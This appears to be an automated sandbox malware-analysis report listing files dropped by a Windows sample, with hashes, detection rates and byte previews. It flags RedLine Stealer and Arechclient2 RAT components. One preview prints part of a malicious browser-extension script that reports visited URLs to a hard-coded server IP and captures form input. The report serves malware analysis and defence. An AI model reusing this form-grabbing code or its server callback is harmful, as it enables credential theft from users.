                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,T............................~.... ........@.. .......................`..............................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............=..............H............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~).....UY.).... .....7...%.....~(.....[Y.)....sr...~).....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~).....SY.)......~).....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.848598812124929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                                                                                                            MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                                                                                                            SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                                                                                                            SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                                                                                                            SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.848598812124929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                                                                                                            MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                                                                                                            SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                                                                                                            SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                                                                                                            SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.848598812124929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                                                                                                            MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                                                                                                            SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                                                                                                            SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                                                                                                            SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):336384
                                                                                                                                                                                                                                            Entropy (8bit):6.453202838334342
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:jjGck+pUZ09BgybSnG+UF5XW1SNYtfvw5ZUDBLL7NVn8yjn5V4d2umdcZyH1IgSw:5k+Zt8PtgSF9VnJrPLdcZGh6hECc
                                                                                                                                                                                                                                            MD5:65A31455A497CAEE44C5AA749C50E40B
                                                                                                                                                                                                                                            SHA1:BE39D07704EFB35BD1503B3914C6DD6C9E6312E8
                                                                                                                                                                                                                                            SHA-256:B94BD24023B0DF0089295B2246546A256D3E82424ECDB0C596B3500525AA4DE0
                                                                                                                                                                                                                                            SHA-512:8FC8D9308FEDE1F2D6B118B6071CE6ED4F86A7CB2442C4C9A9686B772A83961EDA93C81C2C524396688DD1D7B2540D571811AC13CD38FBB72CCD7F6DD06220F9
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 42%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L....8.e.....................f......E9............@..........................P.......g.......................................Q..P....0..................................8............................G..@............................................text............................... ..`.rdata.. k.......l..................@..@.data........`.......N..............@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):4866096
                                                                                                                                                                                                                                            Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                            MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                            SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                            SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                            SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):785920
                                                                                                                                                                                                                                            Entropy (8bit):6.809737341976147
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
                                                                                                                                                                                                                                            MD5:33230F52772BD46C208DFE85537F567F
                                                                                                                                                                                                                                            SHA1:260AAB3C0DD5909C449B62DA56998F8ABD68A235
                                                                                                                                                                                                                                            SHA-256:3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
                                                                                                                                                                                                                                            SHA-512:98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\wyftaheq, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\wyftaheq, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\wyftaheq, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 60%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,T............................~.... ........@.. .......................`..............................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............=..............H............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~).....UY.).... .....7...%.....~(.....[Y.)....sr...~).....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~).....SY.)......~).....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):596
                                                                                                                                                                                                                                            Entropy (8bit):4.089531522812482
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:8/ACiDfZISRZLWxicmFGW8NkzCIzvWkE5rBQNFBajVDGwgI/:8ICi9IyLWxHyGWMjIzWccMFG
                                                                                                                                                                                                                                            MD5:AA0E77EC6B92F58452BB5577B9980E6F
                                                                                                                                                                                                                                            SHA1:237872F2B0C90E8CBE61EAA0E2919D6578CACD3F
                                                                                                                                                                                                                                            SHA-256:AAD1C9BE17F64D7700FEB2D38DF7DC7446A48BF001AE42095B59B11FD24DFCDE
                                                                                                                                                                                                                                            SHA-512:37366BD1E0A59036FE966F2E2FE3A0F7DCE6F11F2ED5BF7724AFB61EA5E8D3E01BDC514F0DEB3BEB6FEBFD8B4D08D45E4E729C23CC8F4CAE4F6D11F18FC39FA6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.async function httpGet(theUrl).{. let response = await fetch(theUrl);. let user = await response.text();.. return user;.}..chrome.runtime.onMessage.addListener(. (request, sender, sendResponse) => {. if (request.message === "get"){. new Promise(async send => {. try{. var key = await httpGet(request.url);. // console.log("send");. send(key);. }catch(error){. send("null");. }.. }).then(sendResponse);. console.log("findl");. return true;. }. . }. );
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1877
                                                                                                                                                                                                                                            Entropy (8bit):5.21369035461985
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:ZG1iVUYRor51e0Ad7hR/NAGVqkh3vCI4dBoYCY+YCL:ZG1OU8thjvfC8
                                                                                                                                                                                                                                            MD5:B2F76BBED8339723AEC98902944219D1
                                                                                                                                                                                                                                            SHA1:F42B147E9914E996DD9109C68D39CAC6B85F3F90
                                                                                                                                                                                                                                            SHA-256:8F571A5F07AC11F23ABE89DC7E5D97FE7F29D3AC39C922621F451ACCB31D9FE3
                                                                                                                                                                                                                                            SHA-512:28659EF32AF311ED342748E1ADA290728C2B5E69A5EC6142D132166D3B15FCD6F7BC765905FC0C1003B9D5F67F43D48ED1E618116C3E743E04062D6F06E1A656
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:var server = "http://91.215.85.66:9000/";.var iddd = 'ABEE5D020398559D1CCC81B5F72669AE';..var debug = 1;.var currLoc = "";..(async function () {...var clientId = iddd;..urlChangeAllert();.....spyjs_refreshEvents(clientId);...})()..function urlChangeAllert(){..try{...var loc = window.location;...getNoRet(server+'churl?pcid='+iddd+"&url="+loc);..}catch(error){ }...}..function spyjs_refreshEvents(clid){..if(currLoc != location.href){...currLoc=location.href;...spyjs_saveData("("+currLoc+")");..}..$('input').unbind('change');..$('input').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('select').unbind('change');..$('select').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('checkbox').unbind('change');..$('checkbox').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('button').unbind('change');..$('button').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});......$('textarea').unbind('change');..$('t
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5657
                                                                                                                                                                                                                                            Entropy (8bit):7.83233516247914
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Nyq+wylRcbfXdRICJdBsooMKWsXFAP39Asutnd4mm5oq+tlwg4Ae4quVpdI8JW1:kq+TRYCooMKDXFAPDutLmKtusquVpG8m
                                                                                                                                                                                                                                            MD5:2C905A6E4A21A3FA14ADC1D99B7CBC03
                                                                                                                                                                                                                                            SHA1:BD8682B580D951E3DF05DFD467ABBA6B87BB43D9
